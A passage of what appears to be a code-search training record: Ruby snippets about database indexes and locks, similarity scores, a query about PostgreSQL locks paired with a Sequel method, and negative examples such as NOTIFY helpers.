"def indexed_database_names\n index_specifications.map do |spec|\n spec.options[:database] || database_name\n end.uniq\n end",
"def suggested_indexes_by_query(queries: nil, query_stats: nil, indexes: nil)\n best_indexes = {}\n\n if suggested_indexes_enabled?\n # get most time-consuming queries\n queries ||= (query_stats || self.query_stats(historical: true, start_at: 24.hours.ago)).map { |qs| qs[:query] }\n\n # get best indexes for queries\n best_indexes = best_index_helper(queries)\n\n if best_indexes.any?\n existing_columns = Hash.new { |hash, key| hash[key] = Hash.new { |hash2, key2| hash2[key2] = [] } }\n indexes ||= self.indexes\n indexes.group_by { |g| g[:using] }.each do |group, inds|\n inds.each do |i|\n existing_columns[group][i[:table]] << i[:columns]\n end\n end\n indexes_by_table = indexes.group_by { |i| i[:table] }\n\n best_indexes.each do |_query, best_index|\n if best_index[:found]\n index = best_index[:index]\n best_index[:table_indexes] = indexes_by_table[index[:table]].to_a\n\n # indexes of same type\n indexes = existing_columns[index[:using] || \"btree\"][index[:table]]\n\n if best_index[:structure][:sort].empty?\n # gist indexes without an opclass\n # (opclass is part of column name, so columns won't match if opclass present)\n indexes += existing_columns[\"gist\"][index[:table]]\n\n # hash indexes work for equality\n indexes += existing_columns[\"hash\"][index[:table]] if best_index[:structure][:where].all? { |v| v[:op] == \"=\" }\n\n # brin indexes work for all\n indexes += existing_columns[\"brin\"][index[:table]]\n end\n\n covering_index = indexes.find { |e| index_covers?(e.map { |v| v.sub(/ inet_ops\\z/, \"\") }, index[:columns]) }\n if covering_index\n best_index[:covering_index] = covering_index\n best_index[:explanation] = \"Covered by index on (#{covering_index.join(\", \")})\"\n end\n end\n end\n end\n else\n raise NotEnabled, \"Suggested indexes not enabled\"\n end\n\n best_indexes\n end",
"def ps_column_indexes\n @ps_column_indexes ||= {\n :user => 0,\n :pid => 1,\n :cpu => 2,\n :memory => 3,\n :vsz => 4,\n :rss => 5,\n :tty => 6,\n :status => 7,\n :started => 8,\n :cpu_time => 9,\n :command => 10\n }\n end",
"def chrono_create_history_indexes_for(table, p_pkey)\n add_temporal_indexes table, :validity, on_current_schema: true\n\n execute \"CREATE INDEX #{table}_inherit_pkey ON #{table} ( #{p_pkey} )\"\n execute \"CREATE INDEX #{table}_recorded_at ON #{table} ( recorded_at )\"\n execute \"CREATE INDEX #{table}_instance_history ON #{table} ( #{p_pkey}, recorded_at )\"\n end",
"def indexed?(table, column); end",
"def temporal_index_names(table, range, options = {})\n prefix = options[:name].presence || \"index_#{table}_temporal\"\n\n # When creating computed indexes\n #\n # e.g. ends_on::timestamp + time '23:59:59'\n #\n # remove everything following the field name.\n range = range.to_s.sub(/\\W.*/, '')\n\n [range, \"lower_#{range}\", \"upper_#{range}\"].map do |suffix|\n [prefix, 'on', suffix].join('_')\n end\n end",
"def on(name)\n indexes_on(name).map.(&method(:index_from_database))\n end",
"def suggested_indexes_by_query(options = {})\n best_indexes = {}\n\n if suggested_indexes_enabled?\n # get most time-consuming queries\n queries = options[:queries] || (options[:query_stats] || self.query_stats(historical: true, start_at: 24.hours.ago)).map { |qs| qs[\"query\"] }\n\n # get best indexes for queries\n best_indexes = best_index_helper(queries)\n\n if best_indexes.any?\n existing_columns = Hash.new { |hash, key| hash[key] = Hash.new { |hash2, key2| hash2[key2] = [] } }\n indexes = self.indexes\n indexes.group_by { |g| g[\"using\"] }.each do |group, inds|\n inds.each do |i|\n existing_columns[group][i[\"table\"]] << i[\"columns\"]\n end\n end\n indexes_by_table = indexes.group_by { |i| i[\"table\"] }\n\n best_indexes.each do |query, best_index|\n if best_index[:found]\n index = best_index[:index]\n best_index[:table_indexes] = indexes_by_table[index[:table]].to_a\n covering_index = existing_columns[index[:using] || \"btree\"][index[:table]].find { |e| index_covers?(e, index[:columns]) }\n if covering_index\n best_index[:covering_index] = covering_index\n best_index[:explanation] = \"Covered by index on (#{covering_index.join(\", \")})\"\n end\n end\n end\n end\n end\n\n best_indexes\n end",
"def list_indexes(opts = {})\n @transporter.read(:GET, '/1/indexes', {}, opts)\n end",
"def generate_text_sql\n ThinkingSphinx.context.indexed_models.each do |model|\n model = model.constantize\n model.define_indexes\n model.sphinx_indexes.each do |idx|\n idx.sources.each do |src|\n puts \"#{model.to_s} SQL => \"\n puts src.to_sql\n end\n end\n end\nend"
] |
[
"0.78263485",
"0.7813025",
"0.7794974",
"0.7794034",
"0.7673546",
"0.76150733",
"0.7565812",
"0.75639427",
"0.7554696",
"0.7554696",
"0.7390897",
"0.7339004",
"0.7273254",
"0.7258199",
"0.72453284",
"0.71867275",
"0.7170862",
"0.714218",
"0.704027",
"0.7033335",
"0.7005751",
"0.7005751",
"0.69842374",
"0.6978574",
"0.6968301",
"0.6968301",
"0.6883104",
"0.68520033",
"0.66517705",
"0.65366167",
"0.6530908",
"0.65159994",
"0.6463609",
"0.64543235",
"0.6451653",
"0.64337987",
"0.64268583",
"0.64266723",
"0.6397183",
"0.6369389",
"0.63687533",
"0.6361503",
"0.6353341",
"0.6343471",
"0.63281244",
"0.63246983",
"0.6303576",
"0.6300279",
"0.6276823",
"0.6256654",
"0.6253182",
"0.6253182",
"0.6246349",
"0.62266564",
"0.6223253",
"0.62104416",
"0.62047243",
"0.6197637",
"0.6197637",
"0.61776197",
"0.61593485",
"0.61502385",
"0.613367",
"0.61102825",
"0.60930526",
"0.6056749",
"0.60485816",
"0.60290897",
"0.6021389",
"0.60133004",
"0.60038346",
"0.5999396",
"0.59814924",
"0.59734553",
"0.59699345",
"0.5956542",
"0.59398484",
"0.59392655",
"0.59372956",
"0.5935423",
"0.59261775",
"0.5891529",
"0.5861507",
"0.5826783",
"0.5799694",
"0.57987034",
"0.57981646",
"0.5793438",
"0.5772128",
"0.57716805",
"0.57671636",
"0.5760072",
"0.5750487",
"0.572752",
"0.57091975",
"0.57014084",
"0.56873924",
"0.56831276",
"0.5673508",
"0.566552"
] |
0.6592221
|
29
|
Dataset containing all current database locks
|
def locks
dataset.from(:pg_class).join(:pg_locks, :relation=>:relfilenode).select{[pg_class[:relname], Sequel::SQL::ColumnAll.new(:pg_locks)]}
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def locks\n sql = %q(\n select\n pg_stat_activity.procpid,\n pg_class.relname,\n pg_locks.transactionid,\n pg_locks.granted,\n substr(pg_stat_activity.current_query,1,30) as query_snippet,\n age(now(),pg_stat_activity.query_start) as \"age\"\n from pg_stat_activity,pg_locks left\n outer join pg_class on (pg_locks.relation = pg_class.oid)\n where pg_stat_activity.current_query <> '<insufficient privilege>' and\n pg_locks.pid=pg_stat_activity.procpid and pg_locks.mode = 'ExclusiveLock' order by query_start)\n\n exec_sql(sql, find_uri)\n end",
"def index\n @migrations_locks = MigrationsLock.all\n end",
"def for_update\n cached_dataset(:_for_update_ds){lock_style(:update)}\n end",
"def resource_locks\n :all\n end",
"def visit_Arel_Nodes_Lock(o, a = nil)\n # SQL Layer does not support row locks\n end",
"def lock_list\n super\n end",
"def coliding_locks\n coliding_locks_scope = Lock.active.where('dyntask_locks.task_id != ?', task_id)\n coliding_locks_scope = coliding_locks_scope.where(name: name,\n resource_id: resource_id,\n resource_type: resource_type)\n unless self.exclusive?\n coliding_locks_scope = coliding_locks_scope.where(:exclusive => true)\n end\n return coliding_locks_scope\n end",
"def read\n return unless locks\n\n result = locks.find(data_bag_id)\n\n result.to_hash if result\n end",
"def supported_locks\n []\n end",
"def nowait\n cached_dataset(:_nowait_ds) do\n raise(Error, 'This dataset does not support raises errors instead of waiting for locked rows') unless supports_nowait?\n clone(:nowait=>true)\n end\n end",
"def lock_keys\n @lock_keys ||= begin\n [stable_hashcode(lock_name), ENV['WITH_ADVISORY_LOCK_PREFIX']].map do |ea|\n # pg advisory args must be 31 bit ints\n ea.to_i & 0x7fffffff\n end\n end\n end",
"def lock_keys\n @lock_keys ||= begin\n [stable_hashcode(lock_name), ENV['WITH_ADVISORY_LOCK_PREFIX']].map do |ea|\n # pg advisory args must be 31 bit ints\n ea.to_i & 0x7fffffff\n end\n end\n end",
"def lock_keys\n @lock_keys ||= [stable_hashcode(lock_name), ENV['WITH_ADVISORY_LOCK_PREFIX']].map do |ea|\n # pg advisory args must be 31 bit ints\n ea.to_i & 0x7fffffff\n end\n end",
"def sync_data\n\t\tSYNC_TABLES.each do |sync|\n\t\t\tself.sync_table(sync)\n\t\tend\n\tend",
"def data_sets\n update\n library.values\n end",
"def select_statement_lock\n Thread.current[:'Arel::Visitors::SQLServerNG.select_statement_lock']\n end",
"def load_cache\n a = dataset.all\n h = {}\n a.each{|o| h[o.pk.freeze] = o.freeze}\n @all = a.freeze\n @cache = h.freeze\n end",
"def all_rows\n cache.all_rows\n end",
"def unlock_all\n update_all('$set': { locking_name_field => nil, locked_at_field => nil }).modified_count\n end",
"def with_database_exclusive_table_lock(&block)\n case @low_card_model.connection.class.name\n when /postgresql/i then with_database_exclusive_table_lock_postgresql(&block)\n when /mysql/i then with_database_exclusive_table_lock_mysql(&block)\n when /sqlite/i then with_database_exclusive_table_lock_sqlite(&block)\n else\n raise LowCardTables::Errors::LowCardUnsupportedDatabaseError, %{You asked for low-card IDs for one or more hashes specifying rows that didn't exist,\nbut, when we went to create them, we discovered that we don't know how to exclusively\nlock tables in your database. (This is very important so that we don't accidentally\ncreate duplicate rows.)\n\nYour database adapter's class name is '#{@low_card_model.connection.class.name}'; please submit at least\na bug report, or, even better, a patch. :) Adding support is quite easy, as long as you know the\nequivalent of 'LOCK TABLE'(s) in your database.}\n end\n end",
"def locks\n @locks ||= begin\n # Grab all the specs from the lockfile\n locks = {}\n parsed_lockfile = Bundler::LockfileParser.new(IO.read(lockfile_path))\n parsed_lockfile.specs.each do |spec|\n # Never include bundler, it can't be bundled and doesn't put itself in\n # the lockfile correctly anyway\n next if spec.name == \"bundler\"\n # Only the platform-specific locks for now (TODO make it possible to emit all locks)\n next if spec.platform && spec.platform != Gem::Platform::RUBY\n lock = lock_source_metadata(spec)\n lock[:version] = spec.version.to_s\n runtime = spec.dependencies.select { |dep| dep.type == :runtime }\n lock[:dependencies] = Set.new(runtime.map { |dep| dep.name })\n lock[:development_dependencies] = Set.new(spec.dependencies.map { |dep| dep.name })\n lock[:dependencies].delete(\"bundler\")\n lock[:development_dependencies].delete(\"bundler\")\n locks[spec.name] = lock\n end\n\n # Transitivize the deps.\n locks.each do |name, lock|\n # Not all deps were brought over (platform-specific ones) so weed them out\n lock[:dependencies] &= locks.keys\n lock[:development_dependencies] &= locks.keys\n\n lock[:dependencies] = transitive_dependencies(locks, name, :dependencies)\n lock[:development_dependencies] = transitive_dependencies(locks, name, :development_dependencies)\n end\n\n locks\n end\n end",
"def all\n\t\t@data_base.keys.dup || []\n\tend",
"def sync\n cached_dataset(:_sync) do\n clone(:async=>false)\n end\n end",
"def databases\n unless defined?(@databases)\n # only use mutex on initialization\n MUTEX.synchronize do\n # return if another process initialized while we were waiting\n return @databases if defined?(@databases)\n\n @databases = config[\"databases\"].map { |id, c| [id.to_sym, Database.new(id, c)] }.to_h\n end\n end\n\n @databases\n end",
"def all\n db.transaction(true) do\n ids = extract_model_ids(db)\n ids.map { |key| db[key] }\n end\n end",
"def return_lock\n\t\t@@logger.info { \"Returning the lock to the database.\" } if have_logger?\n\t\tTournament.dataset.filter(:id => self.id, :locked => true).update(:locked => false) != 0\n\tend",
"def skip_locked\n cached_dataset(:_skip_locked_ds) do\n raise(Error, 'This dataset does not support skipping locked rows') unless supports_skip_locked?\n clone(:skip_locked=>true)\n end\n end",
"def dbs\n @dbs_hash.keys\n end",
"def with_database_exclusive_table_lock_sqlite(&block)\n block.call\n end",
"def acquire_lock\n\t\t@@logger.info { \"Acquiring a lock in the database.\" } if have_logger?\n\t\tTournament.dataset.filter(:id => self.id, :locked => false).update(:locked => true) != 0\n\tend",
"def lock_column_instance_filter\n lc = model.lock_column\n instance_filter(lc=>Sequel.blob(get_column_value(lc)))\n end",
"def unlock_all!\n locks.active.each(&:unlock!)\n end",
"def with_app_lock( &block )\n # acquire lock_expiration\n ok = with_connection_lock do |locked_self|\n if locked_self.lock_expiration.nil? then\n row.update_all lock_expiration: Time.now + DELTA\n true\n end\n end\n # use and release lock_expiration outside of the connection_lock\n if ok then\n begin\n block.call\n ensure\n row.update_all lock_expiration: nil\n end\n end\n end",
"def load_static_cache_rows\n if rows = Sequel.synchronize{@static_cache_cache[name]}\n rows.map{|row| call(row)}.freeze\n else\n rows = dataset.all.freeze\n raw_rows = rows.map(&:values)\n Sequel.synchronize{@static_cache_cache[name] = raw_rows}\n rows\n end\n end",
"def sqls\n @mutex.synchronize do\n s = @sqls.dup\n @sqls.clear\n s\n end\n end",
"def pending_modified_values\n @dbi.pending_modified_values\n end",
"def pending_modified_values\n @dbi.pending_modified_values\n end",
"def set_lock\n klass = self.class\n lock_column_name = klass.locking_column\n\n if has_attribute?(lock_column_name) && klass.parent_relation_keys.count > 0\n criteria = klass.parent_relation_keys.inject({}) do |result, parent_key|\n result[parent_key] = read_attribute(parent_key)\n result\n end\n relation = klass.unscoped.where(criteria)\n\n sql = <<-SQL\n #{relation.select(\"COUNT(#{lock_column_name}) AS value, 0 sort_order\").to_sql}\n UNION\n #{relation.select(\"MAX(#{lock_column_name}) AS value, 1 sort_order\").to_sql}\n ORDER BY sort_order\n SQL\n\n result = klass.connection.execute(sql)\n current_count = result[0][\"value\"]\n current_max = result[1][\"value\"]\n\n lock_value = (current_count.to_s == \"0\" ? 0 : current_max.to_i + 1)\n\n write_attribute(lock_column_name, lock_value)\n end\n end",
"def flush_access_log\n return nil if @logs_access_pending.empty?\n\n @logs_mutex.synchronize do\n ins_arr = @logs_access_pending\n @logs_access_pending = []\n inserts = []\n inserts_links = []\n\n ins_arr.each do |ins|\n gothrough = [{\n :col => :get_keys_data_id,\n :hash => ins[:get],\n :type => :keys\n },{\n :col => :get_values_data_id,\n :hash => ins[:get],\n :type => :values\n },{\n :col => :post_keys_data_id,\n :hash => ins[:post],\n :type => :keys\n },{\n :col => :post_values_data_id,\n :hash => ins[:post],\n :type => :values\n },{\n :col => :cookie_keys_data_id,\n :hash => ins[:cookie],\n :type => :keys\n },{\n :col => :cookie_values_data_id,\n :hash => ins[:cookie],\n :type => :values\n },{\n :col => :meta_keys_data_id,\n :hash => ins[:meta],\n :type => :keys\n },{\n :col => :meta_values_data_id,\n :hash => ins[:meta],\n :type => :values\n }]\n ins_hash = {\n :session_id => ins[:session_id],\n :date_request => ins[:date_request]\n }\n\n gothrough.each do |data|\n if data[:type] == :keys\n hash = Knj::ArrayExt.hash_keys_hash(data[:hash])\n else\n hash = Knj::ArrayExt.hash_values_hash(data[:hash])\n end\n\n data_id = @ob.static(:Log_data, :by_id_hash, hash)\n if !data_id\n data_id = @db.insert(:Log_data, {\"id_hash\" => hash}, {:return_id => true})\n\n link_count = 0\n data[:hash].keys.sort.each do |key|\n if data[:type] == :keys\n ins_data = \"#{key.to_s}\"\n else\n ins_data = \"#{data[:hash][key]}\"\n end\n\n ins_data = ins_data.force_encoding(\"UTF-8\") if ins_data.respond_to?(:force_encoding)\n data_value_id = @ob.static(:Log_data_value, :force_id, ins_data)\n inserts_links << {:no => link_count, :data_id => data_id, :value_id => data_value_id}\n link_count += 1\n end\n end\n\n ins_hash[data[:col]] = data_id\n end\n\n hash = Knj::ArrayExt.array_hash(ins[:ips])\n data_id = @ob.static(:Log_data, :by_id_hash, hash)\n\n if !data_id\n data_id = @db.insert(:Log_data, {\"id_hash\" => hash}, {:return_id => true})\n\n link_count = 0\n ins[:ips].each do |ip|\n data_value_id = @ob.static(:Log_data_value, :force_id, ip)\n inserts_links << {:no => link_count, :data_id => data_id, :value_id => data_value_id}\n link_count += 1\n end\n end\n\n ins_hash[:ip_data_id] = data_id\n inserts << ins_hash\n end\n\n @db.insert_multi(:Log_access, inserts)\n @db.insert_multi(:Log_data_link, inserts_links)\n @ob.unset_class([:Log_access, :Log_data, :Log_data_link, :Log_data_value])\n end\n end",
"def lockdiscovery\n []\n end",
"def lock; end",
"def lock; end",
"def lock; end",
"def transactions\n read_all_transactions\n transaction_cache\n end",
"def lock\n end",
"def all_dbs\n @conn.query({url_path: \"_all_dbs\", method: :get})\n end",
"def all\n ::ActiveRecord::Base.connection_pool.with_connection do\n execute(:all).to_a\n end\n end",
"def all\n Maglev::PERSISTENT_ROOT[self].values\n end",
"def locks\n SidekiqUniqueJobs.locks\n end",
"def unlock_all\n Delayed::Job.transaction do\n Delayed::Job.where(:locked_by => hostname).update_all(:locked_by => nil, :locked_at => nil)\n end\n end",
"def freeze\n valid_connection_sql\n metadata_dataset\n @opts.freeze\n @loggers.freeze\n @pool.freeze\n @dataset_class.freeze\n @dataset_modules.freeze\n @schema_type_classes.freeze\n @loaded_extensions.freeze\n # SEQUEL5: Frozen by default, remove this\n @default_dataset.freeze\n metadata_dataset.freeze\n super\n end",
"def all_data\n @data\n end",
"def get_available_database_ids\n get_available_databases.map{|item| item[:id]}\n end",
"def locked; end",
"def synchronize_resultset; end",
"def all\n Maglev::PERSISTENT_ROOT[self].values\n end",
"def get_all_consistency_group_snapshots\n all_snapshots = []\n consistency_groups = get_all_consistency_groups\n consistency_groups.each do |data|\n cg_id=data['id']\n storage_system=data['storagesystem']\n cg_snapshots = get_consistency_group_snapshots(storage_system,cg_id)\n all_snapshots << cg_snapshots\n end\n all_snapshots = all_snapshots.reduce(:concat)\n end",
"def table_readers\n data_session.table_readers\n end",
"def dataset\n database[table_name]\n end",
"def data_caches\n (@data_caches || [])\n end",
"def databases\n get '_all_dbs'\n end",
"def keys\n db.keys\n end",
"def free_lock\n session.execute(@free_lock_stmt, workspace_id, worker_id).each do |row|\n return row['[applied]']\n end\n end",
"def locked\n end",
"def synchronize_resultset\n # make it reentrant\n return yield if defined?(@resultset_locked) && @resultset_locked\n\n begin\n @resultset_locked = true\n File.open(resultset_writelock, \"w+\") do |f|\n f.flock(File::LOCK_EX)\n yield\n end\n ensure\n @resultset_locked = false\n end\n end",
"def datasets\n Dataset.order(:name).map_h {|d| DataRow.where(ward: self, dataset: d)}\n end",
"def all\n readonly.\n order(\"#{table_name}.recorded_at, hid\").all\n end",
"def blocking\n sql = %q(\n select bl.pid as blocked_pid,\n ka.current_query as blocking_statement,\n now() - ka.query_start as blocking_duration,\n kl.pid as blocking_pid,\n a.current_query as blocked_statement,\n now() - a.query_start as blocked_duration\n from pg_catalog.pg_locks bl\n join pg_catalog.pg_stat_activity a\n on bl.pid = a.procpid\n join pg_catalog.pg_locks kl\n join pg_catalog.pg_stat_activity ka\n on kl.pid = ka.procpid\n on bl.transactionid = kl.transactionid and bl.pid != kl.pid\n where not bl.granted)\n\n exec_sql(sql, find_uri)\n end",
"def lock(mode, &block)\n sql = LOCK % [source_list(@opts[:from]), mode]\n @db.synchronize do\n if block # perform locking inside a transaction and yield to block\n @db.transaction {@db.execute(sql); yield}\n else\n @db.execute(sql) # lock without a transaction\n self\n end\n end\n end",
"def all\n @data\n end",
"def obsolete_data_sets\n data_sets.take_while { |ds| ds != active_data_set }.slice(0...-1)\n end",
"def obsolete_data_sets\n data_sets.take_while { |ds| ds != active_data_set }.slice(0...-1)\n end",
"def jobs\n db[TABLE_NAME]\n rescue ::Sequel::DatabaseError => e\n retry if on_error e\n end",
"def locks(uri, return_child_locks)\n new_locks = []\n\n locks = data\n\n locks.each do |lock|\n next unless lock.uri == uri ||\n # deep locks on parents\n (lock.depth != 0 && uri.index(\"#{lock.uri}/\") == 0) ||\n # locks on children\n (return_child_locks && lock.uri.index(\"#{uri}/\") == 0)\n new_locks << lock\n end\n\n # Checking if we can remove any of these locks\n new_locks.each_with_index do |lock, k|\n new_locks.delete_at(k) if Time.now.to_i > lock.timeout + lock.created\n end\n new_locks\n end",
"def cache\n rows.each(&:cache)\n end",
"def select_lock_sql(sql)\n @opts[:lock] == :update ? sql : super\n end",
"def lock_type\n @lock_type ||= :mysql\n end",
"def list options = {}, &block\n options.to_options!\n Bj.transaction(options) do\n options.delete :rails_env\n table.job.all(options)\n end\n end",
"def all\n storage\n end",
"def all\n data\n end",
"def seek_record_ids_pool(duration: , table_name: )\n _datetimes = duration.ago.beginning_of_minute..Time.now.beginning_of_minute\n _cache_key = \"seek_records_pool:#{duration}\" << Digest::MD5.hexdigest(_datetimes.to_s)\n\n _seek_records_pool = Rails.cache.fetch(_cache_key, expires_in: 5.minutes) do\n _records = SesameMall::Source::SeekRecord.where(\n created_at: _datetimes\n )\n\n _records.pluck_s(:table_name, :primary_key_value).inject({}) {|memo, values|\n memo[values.table_name] ||= []\n memo[values.table_name] << values.primary_key_value\n\n memo\n }\n end\n\n _seek_records_pool[table_name]\n end",
"def nolock\n clone(:table_options => \"(NOLOCK)\")\n end",
"def lock_database\n lock_command = <<-EOS\n echo 'use admin\n db.runCommand({\"fsync\" : 1, \"lock\" : 1})' | #{mongo_shell}\n EOS\n\n run(lock_command)\n end",
"def lock_database\n lock_command = <<-EOS.gsub(/^ +/, ' ')\n echo 'use admin\n db.runCommand({\"fsync\" : 1, \"lock\" : 1})' | #{ \"#{ mongo_utility } #{ mongo_uri }\" }\n EOS\n\n run(lock_command)\n end",
"def locked_mds\n locked_mds = {}\n Matchday.all.each do |m|\n locked_mds[m.week] = m.locked\n end\n locked_mds\n end",
"def index\n @dataset_data = DatasetDatum.all\n end",
"def select_lock_sql(sql)\n lock = @opts[:lock]\n if lock == :share\n sql << ' FOR SHARE'\n else\n super\n end\n\n if lock\n if @opts[:skip_locked]\n sql << \" SKIP LOCKED\"\n elsif @opts[:nowait]\n sql << \" NOWAIT\"\n end\n end\n end",
"def selection_data\n dataset ||= DB[:selections]\n end",
"def lock\n doc['lock']\n end",
"def synchronize(*)\n if ActiveRecord.version >= Gem::Version.new(\"5.1.0\")\n activerecord_connection.lock.synchronize do\n yield activerecord_raw_connection\n end\n else\n yield activerecord_raw_connection\n end\n end",
"def with_locked_file(filename)\n puts \"locking #{filename}\"\n if dataset_marked?(filename, 'locked') \n raise \"already marked as locked\"\n end\n # actual locking\n mark_dataset(filename, 'locked')\n begin\n yield\n ensure\n puts \"unlocking #{filename}\"\n # actual unlocking\n unmark_dataset(filename, 'locked')\n end\n end",
"def delayed_atomic_sets\n @delayed_atomic_sets ||= {}\n end",
"def tasks_info\n all_tasks = Set.new\n all_job_info = {}\n history.each_key do |cycle_index|\n tasks, job_info = tasks_info_of_snapshot(cycle_index)\n all_tasks.merge(tasks)\n all_job_info.merge!(job_info)\n end\n [all_tasks, all_job_info]\n end",
"def all_items\n @allitems ||= syncitems :lastsync => \"1970-01-01 00:00:00\"\n end",
"def index\n @db_jobs = DbJob.all\n end",
"def sql_on_all_sids( command, parameters = {})\n results = []\n oratab = OraTab.new\n oratab.running_database_sids.each do |sid|\n results = results + sql(command, {:sid => sid}.merge(parameters))\n end\n results\n end",
"def commit_time_data\n @buckets\n end",
"def visit_Arel_Nodes_Lock(o, collector)\n collector\n end",
"def current_data\n db_file.data\n end",
"def _indexes_ds\n @_indexes_ds ||= begin\n if server_version >= 90500\n order = [Sequel[:indc][:relname], Sequel.function(:array_position, Sequel[:ind][:indkey], Sequel[:att][:attnum])]\n # :nocov:\n else\n range = 0...32\n order = [Sequel[:indc][:relname], SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(Sequel[:ind][:indkey], [x]), x]}, 32, Sequel[:att][:attnum])]\n # :nocov:\n end\n\n attnums = SQL::Function.new(:ANY, Sequel[:ind][:indkey])\n\n ds = metadata_dataset.\n from{pg_class.as(:tab)}.\n join(Sequel[:pg_index].as(:ind), :indrelid=>:oid).\n join(Sequel[:pg_class].as(:indc), :oid=>:indexrelid).\n join(Sequel[:pg_attribute].as(:att), :attrelid=>Sequel[:tab][:oid], :attnum=>attnums).\n left_join(Sequel[:pg_constraint].as(:con), :conname=>Sequel[:indc][:relname]).\n where{{\n indc[:relkind]=>%w'i I',\n ind[:indisprimary]=>false,\n :indexprs=>nil,\n :indisvalid=>true}}.\n order(*order).\n select{[indc[:relname].as(:name), ind[:indisunique].as(:unique), att[:attname].as(:column), con[:condeferrable].as(:deferrable)]}\n\n # :nocov:\n ds = ds.where(:indisready=>true) if server_version >= 80300\n ds = ds.where(:indislive=>true) if server_version >= 90300\n # :nocov:\n\n ds\n end\n end"
] |
[
"0.6448412",
"0.63300234",
"0.6222221",
"0.5978553",
"0.5910206",
"0.58808726",
"0.57571405",
"0.5666715",
"0.56507355",
"0.56354165",
"0.5576385",
"0.5576385",
"0.5563828",
"0.55490714",
"0.55186725",
"0.54743737",
"0.5468267",
"0.54595023",
"0.54589605",
"0.5430492",
"0.5408446",
"0.5406485",
"0.538636",
"0.53806484",
"0.53779334",
"0.5370447",
"0.5356664",
"0.53509855",
"0.5341294",
"0.5331975",
"0.5297492",
"0.5293648",
"0.52825725",
"0.52559626",
"0.52550346",
"0.5253806",
"0.5253806",
"0.52527744",
"0.5238721",
"0.5234725",
"0.5215464",
"0.5215464",
"0.5215464",
"0.5203778",
"0.51963663",
"0.5194969",
"0.5194465",
"0.51871467",
"0.51828456",
"0.51742655",
"0.51660734",
"0.5157165",
"0.5145782",
"0.5143423",
"0.5135636",
"0.5129813",
"0.51175493",
"0.51151454",
"0.51026",
"0.51016825",
"0.50861233",
"0.5077034",
"0.50587803",
"0.5058413",
"0.5055221",
"0.5048262",
"0.5037618",
"0.5036396",
"0.5024882",
"0.5023136",
"0.500825",
"0.500825",
"0.49936846",
"0.4984589",
"0.49824005",
"0.49650446",
"0.49646607",
"0.49641162",
"0.4962873",
"0.4953791",
"0.49527118",
"0.49487048",
"0.49329132",
"0.49321663",
"0.49315956",
"0.49262562",
"0.4925115",
"0.4919216",
"0.4918508",
"0.49152496",
"0.491465",
"0.49123138",
"0.4908539",
"0.49018613",
"0.48963407",
"0.48932636",
"0.48856616",
"0.48837113",
"0.48825517",
"0.48787114"
] |
0.80763364
|
0
|
Notifies the given channel. See the PostgreSQL NOTIFY documentation. Options: :payload :: The payload string to use for the NOTIFY statement. Only supported in PostgreSQL 9.0+. :server :: The server to which to send the NOTIFY statement, if the sharding support is being used.
|
def notify(channel, opts=OPTS)
sql = String.new
sql << "NOTIFY "
dataset.send(:identifier_append, sql, channel)
if payload = opts[:payload]
sql << ", "
dataset.literal_append(sql, payload.to_s)
end
execute_ddl(sql, opts)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def notify_channel(connection, channel, payload)\n connection.execute(\"NOTIFY #{channel}, #{payload}\")\n end",
"def notify msg, channel \n if @slack_url == '' \n puts \"No slack webhook url specified\"\n return\n end\n \n hash = {:text => msg, :channel => channel}\n json = JSON.generate(hash)\n payload = \"payload=#{json}\"\n\n `curl -X POST --data-urlencode '#{payload}' #{@slack_url}`\n end",
"def notify_observers(*args)\n return unless changed?\n\n unwrap(connection).exec \"NOTIFY #{channel}, #{args}\"\n\n changed false\n end",
"def notify(mid, *args, **kwargs)\n @notification_name = mid\n do_notify(*args, **kwargs)\n end",
"def notify(payload)\n\t\tgeneration_id = [@parameters['generation_id']]\n\t\toptions = {data: { payload: payload } }\n\tend",
"def broadcast_to_channel\n if Setting.first.reminders_enabled\n ActionCable.server.broadcast 'notification_channel', notification: self.to_serialize\n end\n end",
"def channel_notice(chan, notice)\n @connection.send(\"NOTICE #{chan} :#{notice}\")\n end",
"def send_notification *args, &block\n if args.length == 1 && args.first.kind_of?( Rpc::Notification )\n _send_request args.first\n elsif args.length == 1 && args.first.kind_of?( Hash )\n h = args.first\n send_notification( h[\"method\"], h[\"params\"], &block )\n elsif args.length == 2\n _send_request Rpc::Notification.new(self, *args)\n else\n raise Rpc::ServerError(-1, extra_msg: \"in Rpc::Connection.send_notification : Wrong number of argument.\", args: args)\n end\n end",
"def onotify (channel, *args)\n\n do_notify(:all, channel, *args)\n do_notify(channel, channel, *args)\n end",
"def notify_by_push\n PushNotification.new(user: context.user,\n message: context.message,\n n_type: context.n_type,\n data: { from_id: context.user_from.try(:id), from_name: context.user_from.try(:name),\n donation_id: context.donation.try(:id) })\n .simple_notification\n end",
"def notify(params)\n client.post('/notify', params)\n end",
"def notify_game_change\n connection.execute \"NOTIFY #{channel}, #{connection.quote self.to_s}\"\n end",
"def set_notification_channel\n @notification_channel = NotificationChannel.find(params[:id])\n end",
"def send_notification(msg)\n $BLIX_NOTIFY.push(msg)\n puts \"[DummyServer] notify: message=#{msg}\" if $DEBUG\n end",
"def listen(channel, action)\n actions[channel] = action\n pg_connection.exec(%[LISTEN \"#{channel}\";])\n end",
"def notify(*args, **kwargs)\n new.notify(*args, **kwargs)\n end",
"def publish(channel, data)\n send_action('publish', channel, data)\n end",
"def notify!(mid, *args, **hargs)\n notify(mid, *args, **hargs, sync: true)\n end",
"def publish(channel, event, data)\n Pusher[channel].trigger(event,data)\n end",
"def publish(channel, message = '')\n Connection.publish(channel, message)\n end",
"def broadcast_to_channel(channel)\n\t\tmessage = { :channel => channel, :data => channel }.to_json\n\t\turi = URI.parse(PUSH_SERVER)\n\t\tNet::HTTP.post_form(uri, :message => message)\n\tend",
"def notify!(mid, *args, **hargs)\n notify(mid, *args, **hargs, sync: true)\n end",
"def notify(step, options = {})\n notifiers.each do |notifier|\n notifier.notify(step, default_payload.merge(options))\n end\n end",
"def notify_slack!\n post_to_slack(\n ENV['USER_SIGNUP_CHANNEL'],\n to_slack_notification!\n )\n end",
"def notify(message, options={})\n title = options.delete(:title) || 'Rulebow Notification'\n Notify.notify(title, message.to_s, options)\n end",
"def publish( channel, message )\n # Check we are not publishing to a wildcard channel\n STDERR.puts 'Can\\'t publish to a wildcard channel!' if is_channel_wildcard?(channel)\n @client.publish(channel, message)\n end",
